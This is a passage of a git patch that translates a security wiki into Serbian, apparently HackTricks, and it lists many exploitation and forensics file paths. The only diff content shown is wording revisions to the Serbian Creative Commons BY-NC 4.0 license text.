From 3355766553cda6706a947060b8ee1b8cddc503ef Mon Sep 17 00:00:00 2001 
From: Translator Date: Fri, 3 Jan 2025 12:33:41 +0000 Subject: [PATCH] Translated ['src/LICENSE.md', 'src/README.md', 'src/android-forensics.md --- src/LICENSE.md | 50 +- src/README.md | 2 +- src/SUMMARY.md | 1 + src/android-forensics.md | 4 +- src/backdoors/icmpsh.md | 20 +- src/backdoors/salseo.md | 110 +- src/banners/hacktricks-training.md | 12 +- .../arbitrary-write-2-exec/README.md | 2 - .../aw2exec-__malloc_hook.md | 48 +- .../arbitrary-write-2-exec/aw2exec-got-plt.md | 60 +- .../www2exec-.dtors-and-.fini_array.md | 38 +- .../arbitrary-write-2-exec/www2exec-atexit.md | 280 +- src/binary-exploitation/array-indexing.md | 16 +- .../README.md | 138 +- .../elf-tricks.md | 412 ++- .../tools/README.md | 128 +- .../tools/pwntools.md | 128 +- .../README.md | 26 +- .../aslr/README.md | 226 +- .../aslr/ret2plt.md | 58 +- .../aslr/ret2ret.md | 22 +- .../cet-and-shadow-stack.md | 18 +- .../libc-protections.md | 86 +- .../memory-tagging-extension-mte.md | 68 +- .../no-exec-nx.md | 14 +- .../pie/README.md | 24 +- .../pie/bypassing-canary-and-pie.md | 82 +- .../relro.md | 24 +- .../stack-canaries/README.md | 52 +- .../bf-forked-stack-canaries.md | 120 +- .../stack-canaries/print-stack-canary.md | 22 +- .../common-exploiting-problems.md | 18 +- .../format-strings/README.md | 171 +- .../format-strings-arbitrary-read-example.md | 144 +- .../format-strings/format-strings-template.md | 92 +- src/binary-exploitation/integer-overflow.md | 108 +- src/binary-exploitation/ios-exploiting.md | 285 +- src/binary-exploitation/libc-heap/README.md | 440 ++- .../libc-heap/bins-and-memory-allocations.md | 532 ++-- .../libc-heap/double-free.md | 158 +- .../libc-heap/fast-bin-attack.md | 152 +- .../libc-heap/heap-memory-functions/README.md | 2 +- .../libc-heap/heap-memory-functions/free.md | 482 ++-- .../heap-functions-security-checks.md | 218 +- .../malloc-and-sysmalloc.md | 2442 ++++++++--------- .../libc-heap/heap-memory-functions/unlink.md | 102 +- .../libc-heap/heap-overflow.md | 42 +- 
.../libc-heap/house-of-einherjar.md | 60 +- .../libc-heap/house-of-force.md | 66 +- .../libc-heap/house-of-lore.md | 54 +- .../libc-heap/house-of-orange.md | 80 +- .../libc-heap/house-of-rabbit.md | 84 +- .../libc-heap/house-of-roman.md | 100 +- .../libc-heap/house-of-spirit.md | 118 +- .../libc-heap/large-bin-attack.md | 56 +- .../libc-heap/off-by-one-overflow.md | 144 +- .../libc-heap/overwriting-a-freed-chunk.md | 20 +- .../libc-heap/tcache-bin-attack.md | 48 +- .../libc-heap/unlink-attack.md | 150 +- .../libc-heap/unsorted-bin-attack.md | 84 +- .../libc-heap/use-after-free/README.md | 12 +- .../libc-heap/use-after-free/first-fit.md | 44 +- .../rop-return-oriented-programing/README.md | 130 +- .../brop-blind-return-oriented-programming.md | 118 +- .../rop-return-oriented-programing/ret2csu.md | 78 +- .../ret2dlresolve.md | 48 +- .../ret2esp-ret2reg.md | 92 +- .../ret2lib/README.md | 116 +- .../ret2lib/one-gadget.md | 20 +- .../ret2lib/ret2lib-+-printf-leak-arm64.md | 120 +- .../rop-leaking-libc-address/README.md | 248 +- .../rop-leaking-libc-template.md | 212 +- .../ret2vdso.md | 16 +- .../rop-syscall-execv/README.md | 66 +- .../rop-syscall-execv/ret2syscall-arm64.md | 54 +- .../README.md | 40 +- .../srop-arm64.md | 84 +- .../stack-overflow/README.md | 60 +- .../stack-overflow/pointer-redirecting.md | 20 +- .../stack-overflow/ret2win/README.md | 80 +- .../stack-overflow/ret2win/ret2win-arm64.md | 74 +- .../stack-pivoting-ebp2ret-ebp-chaining.md | 164 +- .../stack-overflow/stack-shellcode/README.md | 62 +- .../stack-shellcode/stack-shellcode-arm64.md | 32 +- .../stack-overflow/uninitialized-variables.md | 68 +- ...windows-exploiting-basic-guide-oscp-lvl.md | 146 +- .../README.md | 180 +- src/burp-suite.md | 2 +- .../blockchain-and-crypto-currencies.md | 180 +- src/crypto-and-stego/certificates.md | 200 +- .../cipher-block-chaining-cbc-mac-priv.md | 44 +- src/crypto-and-stego/crypto-ctfs-tricks.md | 146 +- .../cryptographic-algorithms/README.md | 148 +- 
.../unpacking-binaries.md | 34 +- .../electronic-code-book-ecb.md | 68 +- src/crypto-and-stego/esoteric-languages.md | 10 +- .../hash-length-extension-attack.md | 40 +- src/crypto-and-stego/padding-oracle-priv.md | 77 +- .../rc4-encrypt-and-decrypt.md | 4 +- src/crypto-and-stego/stego-tricks.md | 140 +- src/cryptography/certificates.md | 182 +- .../cipher-block-chaining-cbc-mac-priv.md | 44 +- src/cryptography/crypto-ctfs-tricks.md | 144 +- src/cryptography/electronic-code-book-ecb.md | 68 +- .../hash-length-extension-attack.md | 40 +- src/cryptography/padding-oracle-priv.md | 80 +- src/cryptography/rc4-encrypt-and-decrypt.md | 4 +- src/emails-vulns.md | 3 +- .../linux-exploiting-basic-esp/README.md | 406 ++- .../linux-exploiting-basic-esp/fusion.md | 8 +- src/exploiting/tools/README.md | 124 +- src/exploiting/tools/pwntools.md | 128 +- ...windows-exploiting-basic-guide-oscp-lvl.md | 146 +- .../basic-forensic-methodology/README.md | 32 +- .../anti-forensic-techniques.md | 154 +- .../docker-forensics.md | 76 +- .../file-integrity-monitoring.md | 20 +- .../linux-forensics.md | 358 +-- .../malware-analysis.md | 110 +- .../memory-dump-analysis/README.md | 34 +- .../partitions-file-systems-carving/README.md | 226 +- .../file-data-carving-recovery-tools.md | 66 +- .../file-data-carving-tools.md | 44 +- .../pcap-inspection/README.md | 120 +- .../usb-keyboard-pcap-analysis.md | 8 +- .../pcap-inspection/usb-keystrokes.md | 8 +- .../pcap-inspection/wifi-pcap-analysis.md | 24 +- .../.pyc.md | 152 +- .../README.md | 2 +- .../browser-artifacts.md | 164 +- .../desofuscation-vbs-cscript.exe.md | 40 +- .../local-cloud-storage.md | 115 +- .../office-file-analysis.md | 30 +- .../pdf-file-analysis.md | 30 +- .../png-tricks.md | 6 +- .../video-and-audio-file-analysis.md | 22 +- .../zips-tricks.md | 20 +- .../windows-forensics/README.md | 455 ++- .../interesting-windows-registry-keys.md | 100 +- .../windows-forensics/windows-processes.md | 90 +- src/generic-hacking/brute-force.md | 358 
+-- src/generic-hacking/exfiltration.md | 136 +- src/generic-hacking/reverse-shells/README.md | 2 +- .../expose-local-to-the-internet.md | 32 +- .../reverse-shells/full-ttys.md | 50 +- src/generic-hacking/reverse-shells/linux.md | 214 +- .../reverse-shells/msfvenom.md | 98 +- src/generic-hacking/reverse-shells/windows.md | 288 +- src/generic-hacking/search-exploits.md | 41 +- .../tunneling-and-port-forwarding.md | 304 +- .../basic-forensic-methodology/README.md | 32 +- .../anti-forensic-techniques.md | 114 +- .../docker-forensics.md | 74 +- .../file-integrity-monitoring.md | 20 +- .../image-acquisition-and-mount.md | 47 +- .../linux-forensics.md | 360 +-- .../malware-analysis.md | 110 +- .../memory-dump-analysis/README.md | 34 +- .../volatility-cheatsheet.md | 326 +-- .../partitions-file-systems-carving/README.md | 224 +- .../file-data-carving-recovery-tools.md | 66 +- .../pcap-inspection/README.md | 124 +- .../pcap-inspection/dnscat-exfiltration.md | 28 +- .../suricata-and-iptables-cheatsheet.md | 112 +- .../pcap-inspection/usb-keystrokes.md | 8 +- .../pcap-inspection/wifi-pcap-analysis.md | 26 +- .../pcap-inspection/wireshark-tricks.md | 116 +- .../.pyc.md | 152 +- .../README.md | 2 +- .../browser-artifacts.md | 164 +- .../desofuscation-vbs-cscript.exe.md | 40 +- .../local-cloud-storage.md | 115 +- .../office-file-analysis.md | 30 +- .../pdf-file-analysis.md | 30 +- .../png-tricks.md | 6 +- .../video-and-audio-file-analysis.md | 10 +- .../zips-tricks.md | 20 +- .../windows-forensics/README.md | 450 ++- .../interesting-windows-registry-keys.md | 52 +- .../external-recon-methodology/README.md | 528 ++-- .../github-leaked-secrets.md | 11 +- .../wide-source-code-search.md | 16 +- .../pentesting-methodology.md | 138 +- .../pentesting-network/README.md | 550 ++-- .../pentesting-network/dhcpv6.md | 36 +- .../pentesting-network/eigrp-attacks.md | 96 +- .../glbp-and-hsrp-attacks.md | 154 +- .../pentesting-network/ids-evasion.md | 56 +- 
.../lateral-vlan-segmentation-bypass.md | 34 +- .../network-protocols-explained-esp.md | 36 +- .../pentesting-network/nmap-summary-esp.md | 257 +- .../pentesting-network/pentesting-ipv6.md | 114 +- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 112 +- .../spoofing-ssdp-and-upnp-devices.md | 32 +- .../pentesting-network/webrtc-dos.md | 36 +- .../pentesting-wifi/README.md | 613 ++--- .../pentesting-wifi/evil-twin-eap-tls.md | 36 +- .../phishing-methodology/README.md | 396 ++- .../phishing-methodology/clone-a-website.md | 22 +- .../phishing-methodology/detecting-phising.md | 64 +- .../phishing-documents.md | 158 +- .../python/README.md | 28 +- .../python/basic-python.md | 272 +- .../python/bruteforce-hash-few-chars.md | 52 +- .../python/bypass-python-sandboxes/README.md | 721 +++-- .../load_name-load_const-opcode-oob-read.md | 220 +- ...s-pollution-pythons-prototype-pollution.md | 208 +- .../python/pyscript.md | 212 +- .../python/python-internal-read-gadgets.md | 30 +- .../python/venv.md | 18 - .../python/web-requests.md | 71 +- .../threat-modeling.md | 96 +- .../escaping-from-gui-applications.md | 348 +-- .../firmware-analysis/README.md | 214 +- .../firmware-analysis/bootloader-testing.md | 62 +- .../firmware-analysis/firmware-integrity.md | 38 +- .../physical-attacks.md | 52 +- src/interesting-http.md | 21 +- .../bypass-bash-restrictions/README.md | 88 +- .../README.md | 97 +- .../ddexec.md | 76 +- src/linux-hardening/freeipa-pentesting.md | 114 +- .../linux-environment-variables.md | 86 +- .../linux-post-exploitation/README.md | 42 +- .../pam-pluggable-authentication-modules.md | 44 +- .../linux-privilege-escalation-checklist.md | 218 +- .../privilege-escalation/README.md | 148 +- .../privilege-escalation/cisco-vmanage.md | 52 +- .../containerd-ctr-privilege-escalation.md | 28 +- ...-command-injection-privilege-escalation.md | 458 ++-- .../docker-security/README.md | 32 +- ...-docker-socket-for-privilege-escalation.md | 4 +- .../docker-security/apparmor.md | 28 +- 
...uthn-docker-access-authorization-plugin.md | 12 +- .../docker-security/cgroups.md | 20 +- .../README.md | 34 +- ...se_agent-exploit-relative-paths-to-pids.md | 2 +- .../sensitive-mounts.md | 10 +- .../docker-security/docker-privileged.md | 12 +- .../namespaces/cgroup-namespace.md | 14 +- .../namespaces/ipc-namespace.md | 18 +- .../namespaces/mount-namespace.md | 8 +- .../namespaces/network-namespace.md | 22 +- .../namespaces/pid-namespace.md | 6 +- .../namespaces/time-namespace.md | 10 +- .../namespaces/user-namespace.md | 44 +- .../namespaces/uts-namespace.md | 6 +- .../docker-security/seccomp.md | 16 +- .../docker-security/weaponizing-distroless.md | 2 +- .../electron-cef-chromium-debugger-abuse.md | 112 +- .../escaping-from-limited-bash.md | 176 +- .../privilege-escalation/euid-ruid-suid.md | 170 +- .../interesting-groups-linux-pe/README.md | 24 +- .../lxd-privilege-escalation.md | 2 +- .../ld.so.conf-example.md | 16 +- .../linux-active-directory.md | 18 +- .../linux-capabilities.md | 86 +- .../privilege-escalation/logstash.md | 4 +- .../nfs-no_root_squash-misconfiguration-pe.md | 12 +- .../payloads-to-execute.md | 4 +- .../splunk-lpe-and-persistence.md | 2 +- .../ssh-forward-agent-exploitation.md | 4 +- .../wildcards-spare-tricks.md | 12 +- src/linux-hardening/useful-linux-commands.md | 50 +- .../bypass-bash-restrictions.md | 4 +- .../privilege-escalation/exploiting-yum.md | 2 +- .../interesting-groups-linux-pe.md | 12 +- .../macos-auto-start-locations.md | 136 +- .../macos-red-teaming/README.md | 28 +- .../macos-red-teaming/macos-keychain.md | 56 +- .../macos-red-teaming/macos-mdm/README.md | 44 +- ...nrolling-devices-in-other-organisations.md | 20 +- .../README.md | 6 +- .../macos-function-hooking.md | 8 +- .../mac-os-architecture/macos-iokit.md | 20 +- .../macos-applefs.md | 4 +- .../macos-basic-objective-c.md | 8 +- .../macos-bypassing-firewalls.md | 2 +- .../macos-defensive-apps.md | 18 +- ...yld-hijacking-and-dyld_insert_libraries.md | 2 +- 
.../macos-file-extension-apps.md | 4 +- .../macos-gcd-grand-central-dispatch.md | 28 +- .../macos-privilege-escalation.md | 10 +- .../macos-protocols.md | 18 +- src/online-platforms-with-api.md | 79 +- src/other-web-tricks.md | 30 +- src/pentesting-dns.md | 6 +- .../hacking-jwt-json-web-tokens.md | 52 +- src/post-exploitation.md | 18 +- ...itive-information-disclosure-from-a-web.md | 14 +- 290 files changed, 13136 insertions(+), 16612 deletions(-) diff --git a/src/LICENSE.md b/src/LICENSE.md index 95118d40a..db40152b3 100644 --- a/src/LICENSE.md +++ b/src/LICENSE.md 
@@ -11,7 +11,7 @@ Formatiranje: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/ # Attribution-NonCommercial 4.0 International -Creative Commons Corporation (“Creative Commons”) nije advokatska kancelarija i ne pruža pravne usluge ili pravne savete. Distribucija javnih licenci Creative Commons ne stvara odnos advokat-klijent ili neki drugi odnos. Creative Commons stavlja svoje licence i povezane informacije na raspolaganje na osnovu "kako jeste". Creative Commons ne daje nikakve garancije u vezi sa svojim licencama, bilo kojim materijalom licenciranim pod njihovim uslovima i odredbama, ili bilo kojim povezanim informacijama. Creative Commons se odriče svake odgovornosti za štetu koja proizađe iz njihove upotrebe u najvećoj mogućoj meri. +Creative Commons Corporation (“Creative Commons”) nije advokatska kancelarija i ne pruža pravne usluge ili pravne savete. Distribucija javnih licenci Creative Commons ne stvara odnos advokat-klijent ili neki drugi odnos. Creative Commons stavlja svoje licence i povezane informacije na raspolaganje na osnovu "kako jeste". Creative Commons ne daje nikakve garancije u vezi sa svojim licencama, bilo kojim materijalom licenciranim pod njihovim uslovima i odredbama, ili bilo kojim povezanim informacijama. Creative Commons se odriče svake odgovornosti za štete koje proizađu iz njihove upotrebe u najvećoj mogućoj meri. ## Korišćenje javnih licenci Creative Commons 
@@ -19,21 +19,21 @@ Javne licence Creative Commons pružaju standardni set uslova i odredbi koje kre - **Razmatranja za licencodavce:** Naše javne licence su namenjene onima koji su ovlašćeni da daju javnosti dozvolu za korišćenje materijala na načine koji su inače ograničeni autorskim pravom i određenim drugim pravima. Naše licence su nepovratne. Licencodavci treba da pročitaju i razumeju uslove i odredbe licence koju biraju pre nego što je primene. Licencodavci takođe treba da obezbede sva potrebna prava pre nego što primene naše licence kako bi javnost mogla ponovo koristiti materijal kako se očekuje. Licencodavci treba jasno da označe bilo koji materijal koji nije podložan licenci. Ovo uključuje drugi materijal licenciran pod CC, ili materijal korišćen pod izuzetkom ili ograničenjem autorskog prava. [Više razmatranja za licencodavce](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -- **Razmatranja za javnost:** Korišćenjem jedne od naših javnih licenci, licencodavac daje javnosti dozvolu da koristi licencirani materijal pod navedenim uslovima i odredbama. Ako dozvola licencodavca nije potrebna iz bilo kog razloga – na primer, zbog bilo kog primenljivog izuzetka ili ograničenja autorskog prava – tada ta upotreba nije regulisana licencom. Naše licence daju samo dozvole pod autorskim pravom i određenim drugim pravima koja licencodavac ima ovlašćenje da dodeli. Upotreba licenciranog materijala može biti i dalje ograničena iz drugih razloga, uključujući zato što drugi imaju autorska ili druga prava na materijal. Licencodavac može postaviti posebne zahteve, kao što je traženje da sve promene budu označene ili opisane. Iako nije obavezno prema našim licencama, ohrabrujemo vas da poštujete te zahteve gde je to razumno. [Više razmatranja za javnost](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). 
+- **Razmatranja za javnost:** Korišćenjem jedne od naših javnih licenci, licencodavac daje javnosti dozvolu da koristi licencirani materijal pod navedenim uslovima i odredbama. Ako dozvola licencodavca nije potrebna iz bilo kog razloga – na primer, zbog bilo kog primenljivog izuzetka ili ograničenja autorskog prava – tada ta upotreba nije regulisana licencom. Naše licence daju samo dozvole pod autorskim pravom i određenim drugim pravima koja licencodavac ima ovlašćenje da dodeli. Upotreba licenciranog materijala može biti i dalje ograničena iz drugih razloga, uključujući zato što drugi imaju autorska ili druga prava na materijal. Licencodavac može postaviti posebne zahteve, kao što je traženje da sve promene budu označene ili opisane. Iako to nije obavezno prema našim licencama, ohrabrujemo vas da poštujete te zahteve gde je to razumno. [Više razmatranja za javnost](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). # Creative Commons Attribution-NonCommercial 4.0 International Public License -Korišćenjem Licenciranih Prava (definisanih u nastavku), prihvatate i slažete se da ćete biti obavezani uslovima i odredbama ove Creative Commons Attribution-NonCommercial 4.0 International Public License ("Javna Licenca"). U meri u kojoj se ova Javna Licenca može tumačiti kao ugovor, dodeljuju vam se Licencirana Prava u zamenu za vaše prihvatanje ovih uslova i odredbi, a Licencodavac vam dodeljuje takva prava u zamenu za koristi koje Licencodavac dobija od stavljanja Licenciranog Materijala na raspolaganje pod ovim uslovima i odredbama. +Korišćenjem Licenciranih Prava (definisanih u nastavku), prihvatate i slažete se da ćete biti vezani uslovima i odredbama ove Creative Commons Attribution-NonCommercial 4.0 International Public License ("Javna Licenca"). 
U meri u kojoj se ova Javna Licenca može tumačiti kao ugovor, dodeljuju vam se Licencirana Prava u zamenu za vaše prihvatanje ovih uslova i odredbi, a Licencodavac vam dodeljuje takva prava u zamenu za koristi koje Licencodavac dobija od stavljanja Licenciranog Materijala na raspolaganje pod ovim uslovima i odredbama. ## Odeljak 1 – Definicije. -a. **Prilagođeni Materijal** znači materijal podložan Autorskom pravu i Sličnim Pravima koji je izveden iz ili zasnovan na Licenciranom Materijalu i u kojem je Licencirani Materijal preveden, izmenjen, aranžiran, transformisan ili na drugi način modifikovan na način koji zahteva dozvolu prema Autorskom pravu i Sličnim Pravima koja drži Licencodavac. U svrhu ove Javne Licence, kada je Licencirani Materijal muzičko delo, izvođenje ili zvučna snimka, Prilagođeni Materijal se uvek proizvodi kada je Licencirani Materijal sinhronizovan u vremenskoj vezi sa pokretnom slikom. +a. **Prilagođeni Materijal** znači materijal koji je podložan Autorskom pravu i Sličnim Pravima koji je izveden iz ili zasnovan na Licenciranom Materijalu i u kojem je Licencirani Materijal preveden, izmenjen, aranžiran, transformisan ili na drugi način modifikovan na način koji zahteva dozvolu prema Autorskom pravu i Sličnim Pravima koja drži Licencodavac. U svrhe ove Javne Licence, kada je Licencirani Materijal muzičko delo, izvođenje ili zvučna snimka, Prilagođeni Materijal se uvek proizvodi kada je Licencirani Materijal sinhronizovan u vremenskoj vezi sa pokretnom slikom. b. **Licenca Prilagoditelja** znači licenca koju primenjujete na svoja Autorska prava i Slična prava u vašim doprinosima Prilagođenom Materijalu u skladu sa uslovima i odredbama ove Javne Licence. -c. **Autorska prava i Slična prava** znače autorska prava i/ili slična prava koja su blisko povezana sa autorskim pravom uključujući, bez ograničenja, izvođenje, emitovanje, zvučnu snimku i Sui Generis Prava Baze Podataka, bez obzira na to kako su prava označena ili kategorizovana. 
U svrhu ove Javne Licence, prava navedena u Odeljku 2(b)(1)-(2) nisu Autorska prava i Slična prava. +c. **Autorska prava i Slična prava** znače autorska prava i/ili slična prava koja su blisko povezana sa autorskim pravom uključujući, bez ograničenja, izvođenje, emitovanje, zvučnu snimku i Sui Generis Prava Baze Podataka, bez obzira na to kako su prava označena ili kategorizovana. U svrhe ove Javne Licence, prava navedena u Odeljku 2(b)(1)-(2) nisu Autorska prava i Slična prava. -d. **Efikasne Tehnološke Mere** znače one mere koje, u odsustvu odgovarajuće vlasti, ne mogu biti zaobiđene prema zakonima koji ispunjavaju obaveze prema Članu 11 WIPO Ugovora o Autorskom pravu usvojenog 20. decembra 1996. godine, i/ili sličnim međunarodnim sporazumima. +d. **Efikasne Tehnološke Mere** znače one mere koje, u odsustvu odgovarajuće vlasti, ne mogu biti zaobiđene prema zakonima koji ispunjavaju obaveze prema Članu 11 WIPO Ugovora o Autorskom Pravu usvojenog 20. decembra 1996. godine, i/ili sličnim međunarodnim sporazumima. e. **Izuzeci i Ograničenja** znače poštenu upotrebu, pošteno postupanje i/ili bilo koji drugi izuzetak ili ograničenje na Autorska prava i Slična prava koja se primenjuju na vašu upotrebu Licenciranog Materijala. 
@@ -43,11 +43,11 @@ g. **Licencirana Prava** znače prava koja su vam dodeljena podložna uslovima i h. **Licencodavac** znači pojedinac(e) ili entitet(e) koji dodeljuju prava prema ovoj Javnoj Licenci. -i. **NeKomercijalno** znači da nije prvenstveno namenjeno ili usmereno ka komercijalnoj koristi ili novčanoj naknadi. U svrhu ove Javne Licence, razmena Licenciranog Materijala za drugi materijal podložan Autorskom pravu i Sličnim Pravima putem digitalnog deljenja datoteka ili sličnih sredstava je NeKomercijalna pod uslovom da ne postoji plaćanje novčane naknade u vezi sa razmenom. +i. **Ne-komercijalno** znači da nije prvenstveno namenjeno ili usmereno ka komercijalnoj koristi ili novčanoj naknadi. U svrhe ove Javne Licence, razmena Licenciranog Materijala za drugi materijal podložan Autorskom pravu i Sličnim Pravima putem digitalnog deljenja datoteka ili sličnih sredstava je Ne-komercijalna pod uslovom da ne postoji plaćanje novčane naknade u vezi sa razmenom. j. **Deliti** znači pružiti materijal javnosti bilo kojim sredstvom ili procesom koji zahteva dozvolu prema Licenciranim Pravima, kao što su reprodukcija, javno prikazivanje, javno izvođenje, distribucija, širenje, komunikacija ili uvoz, i učiniti materijal dostupnim javnosti uključujući načine na koje članovi javnosti mogu pristupiti materijalu iz mesta i u vreme koje su pojedinačno izabrali. -k. **Sui Generis Prava Baze Podataka** znače prava osim autorskih prava koja proizlaze iz Direktive 96/9/EC Evropskog parlamenta i Saveta od 11. marta 1996. godine o pravnoj zaštiti baza podataka, kako je izmenjena i/ili nasledila, kao i druga suštinski ekvivalentna prava bilo gde u svetu. +k. **Sui Generis Prava Baze Podataka** znače prava osim autorskih prava koja proističu iz Direktive 96/9/EC Evropskog parlamenta i Saveta od 11. marta 1996. godine o pravnoj zaštiti baza podataka, kako je izmenjena i/ili nasledila, kao i druga suštinski ekvivalentna prava bilo gde u svetu. l. 
**Vi** znači pojedinac ili entitet koji koristi Licencirana Prava prema ovoj Javnoj Licenci. Vaš ima odgovarajuće značenje. 
@@ -57,33 +57,33 @@ a. **_Dodeljivanje licence._** 1. Podložna uslovima i odredbama ove Javne Licence, Licencodavac ovim putem dodeljuje vam svetsku, bezautorsku, ne-prenosivu, ne-ekskluzivnu, nepovratnu licencu za korišćenje Licenciranih Prava u Licenciranom Materijalu da: -A. reprodukujete i Delite Licencirani Materijal, u celini ili delimično, samo za NeKomercijalne svrhe; i +A. reprodukujete i Delite Licencirani Materijal, u celini ili delimično, samo za Ne-komercijalne svrhe; i -B. proizvodite, reprodukujete i Delite Prilagođeni Materijal samo za NeKomercijalne svrhe. +B. proizvodite, reprodukujete i Delite Prilagođeni Materijal samo za Ne-komercijalne svrhe. 2. **Izuzeci i Ograničenja.** Radi izbegavanja sumnje, gde se Izuzeci i Ograničenja primenjuju na vašu upotrebu, ova Javna Licenca se ne primenjuje, i ne morate se pridržavati njenih uslova i odredbi. 3. **Trajanje.** Trajanje ove Javne Licence je navedeno u Odeljku 6(a). -4. **Mediji i formati; tehničke modifikacije dozvoljene.** Licencodavac vam odobrava da koristite Licencirana Prava u svim medijima i formatima, bilo da su sada poznati ili će biti stvoreni, i da napravite tehničke modifikacije potrebne za to. Licencodavac se odriče i/ili se slaže da ne tvrdi bilo koje pravo ili ovlašćenje da vam zabrani pravljenje tehničkih modifikacija potrebnih za korišćenje Licenciranih Prava, uključujući tehničke modifikacije potrebne za zaobilaženje Efikasnih Tehnoloških Mera. U svrhu ove Javne Licence, jednostavno pravljenje modifikacija odobrenih ovim Odeljkom 2(a)(4) nikada ne proizvodi Prilagođeni Materijal. -5. **Primalac nizvodno.** +4. **Mediji i formati; tehničke modifikacije dozvoljene.** Licencodavac vam odobrava da koristite Licencirana Prava u svim medijima i formatima, bilo da su sada poznati ili će biti stvoreni, i da napravite tehničke modifikacije potrebne za to. 
Licencodavac se odriče i/ili se slaže da ne tvrdi bilo koje pravo ili ovlašćenje da vam zabrani da napravite tehničke modifikacije potrebne za korišćenje Licenciranih Prava, uključujući tehničke modifikacije potrebne za zaobilaženje Efikasnih Tehnoloških Mera. U svrhe ove Javne Licence, jednostavno pravljenje modifikacija odobrenih ovim Odeljkom 2(a)(4) nikada ne proizvodi Prilagođeni Materijal. +5. **Primalci nizvodno.** A. **Ponuda od Licencodavca – Licencirani Materijal.** Svaki primalac Licenciranog Materijala automatski prima ponudu od Licencodavca da koristi Licencirana Prava pod uslovima i odredbama ove Javne Licence. B. **Bez nizvodnih ograničenja.** Ne smete ponuditi ili nametnuti bilo koje dodatne ili različite uslove ili odredbe na, ili primeniti bilo koje Efikasne Tehnološke Mere na, Licencirani Materijal ako to ograničava korišćenje Licenciranih Prava od strane bilo kog primaoca Licenciranog Materijala. -6. **Bez podrške.** Ništa u ovoj Javnoj Licenci ne predstavlja ili se ne može tumačiti kao dozvola da se tvrdi ili implicira da ste vi, ili da je vaša upotreba Licenciranog Materijala, povezana sa, ili sponzorisana, podržana ili dodeljena zvanični status od strane, Licencodavca ili drugih koji su označeni da prime atribuciju kako je navedeno u Odeljku 3(a)(1)(A)(i). +6. **Bez odobravanja.** Ništa u ovoj Javnoj Licenci ne predstavlja ili se ne može tumačiti kao dozvola da se tvrdi ili implicira da ste vi, ili da je vaša upotreba Licenciranog Materijala, povezana sa, ili sponzorisana, odobrena ili dodeljena zvanični status od strane, Licencodavca ili drugih koji su označeni da prime atribuciju kako je navedeno u Odeljku 3(a)(1)(A)(i). -b. **_Ostala prava._** +b. **_Druga prava._** 1. 
Moralna prava, kao što je pravo na integritet, nisu licencirana prema ovoj Javnoj Licenci, niti su prava na javnost, privatnost i/ili druga slična prava ličnosti; međutim, u meri u kojoj je to moguće, Licencodavac se odriče i/ili se slaže da ne tvrdi bilo koja takva prava koja drži Licencodavac u ograničenoj meri potrebnoj da vam omogući korišćenje Licenciranih Prava, ali ne i drugačije. 2. Patenti i prava na zaštitne znakove nisu licencirani prema ovoj Javnoj Licenci. -3. U meri u kojoj je to moguće, Licencodavac se odriče bilo kojeg prava da prikuplja tantijeme od vas za korišćenje Licenciranih Prava, bilo direktno ili putem kolektivnog društva prema bilo kojem dobrovoljnom ili odustajivom zakonskom ili obaveznom licencnom režimu. U svim drugim slučajevima Licencodavac izričito zadržava bilo koje pravo da prikuplja takve tantijeme, uključujući kada se Licencirani Materijal koristi na način koji nije za NeKomercijalne svrhe. +3. U meri u kojoj je to moguće, Licencodavac se odriče bilo kojeg prava da prikuplja naknade od vas za korišćenje Licenciranih Prava, bilo direktno ili putem kolektivnog društva prema bilo kojem dobrovoljnom ili odustajivom zakonskom ili obaveznom licencnom režimu. U svim drugim slučajevima Licencodavac izričito zadržava bilo koje pravo da prikuplja takve naknade, uključujući kada se Licencirani Materijal koristi na način koji nije za Ne-komercijalne svrhe. ## Odeljak 3 – Uslovi licence. -Vaša upotreba Licenciranih Prava je izričito podložna sledećim uslovima. +Vaša upotreba Licenciranih Prava izričito je podložna sledećim uslovima. a. **_Atribucija._** 
@@ -105,9 +105,9 @@ B. naznačiti ako ste izmenili Licencirani Materijal i zadržati oznaku bilo koj C. naznačiti da je Licencirani Materijal licenciran pod ovom Javnom Licencom, i uključiti tekst ili URI ili hyperlink ka ovoj Javnoj Licenci. -2. Možete ispuniti uslove iz Odeljka 3(a)(1) na bilo koji razuman način na osnovu medija, sredstava i konteksta u kojem Delite Licencirani Materijal. Na primer, može biti razumno ispuniti uslove pružanjem URI ili hyperlinka ka resursu koji uključuje potrebne informacije. +2. Možete ispuniti uslove u Odeljku 3(a)(1) na bilo koji razuman način na osnovu medija, sredstava i konteksta u kojem Delite Licencirani Materijal. Na primer, može biti razumno ispuniti uslove pružanjem URI ili hyperlinka ka resursu koji uključuje potrebne informacije. -3. Ako to zatraži Licencodavac, morate ukloniti bilo koju od informacija zahtevanih Odeljkom 3(a)(1)(A) u meri koja je razumno moguća. +3. Ako to zatraži Licencodavac, morate ukloniti bilo koju od informacija zahtevanih u Odeljku 3(a)(1)(A) u meri koja je razumno moguća. 4. Ako Delite Prilagođeni Materijal koji proizvodite, Licenca Prilagoditelja koju primenjujete ne sme sprečiti primaoce Prilagođenog Materijala da se pridržavaju ove Javne Licence. 
@@ -115,17 +115,17 @@ C. naznačiti da je Licencirani Materijal licenciran pod ovom Javnom Licencom, i Gde Licencirana Prava uključuju Sui Generis Prava Baze Podataka koja se primenjuju na vašu upotrebu Licenciranog Materijala: -a. radi izbegavanja sumnje, Odeljak 2(a)(1) dodeljuje vam pravo da ekstraktujete, ponovo koristite, reprodukujete i Delite sve ili značajan deo sadržaja baze podataka samo za NeKomercijalne svrhe; +a. radi izbegavanja sumnje, Odeljak 2(a)(1) dodeljuje vam pravo da ekstraktujete, ponovo koristite, reprodukujete i Delite sve ili značajan deo sadržaja baze podataka samo za Ne-komercijalne svrhe; b. ako uključite sve ili značajan deo sadržaja baze podataka u bazu podataka u kojoj imate Sui Generis Prava Baze Podataka, tada baza podataka u kojoj imate Sui Generis Prava Baze Podataka (ali ne njeni pojedinačni sadržaji) je Prilagođeni Materijal; i -c. morate se pridržavati uslova iz Odeljka 3(a) ako Delite sve ili značajan deo sadržaja baze podataka. +c. morate se pridržavati uslova u Odeljku 3(a) ako Delite sve ili značajan deo sadržaja baze podataka. Radi izbegavanja sumnje, ovaj Odeljak 4 dopunjuje i ne zamenjuje vaše obaveze prema ovoj Javnoj Licenci gde Licencirana Prava uključuju druga Autorska prava i Slična 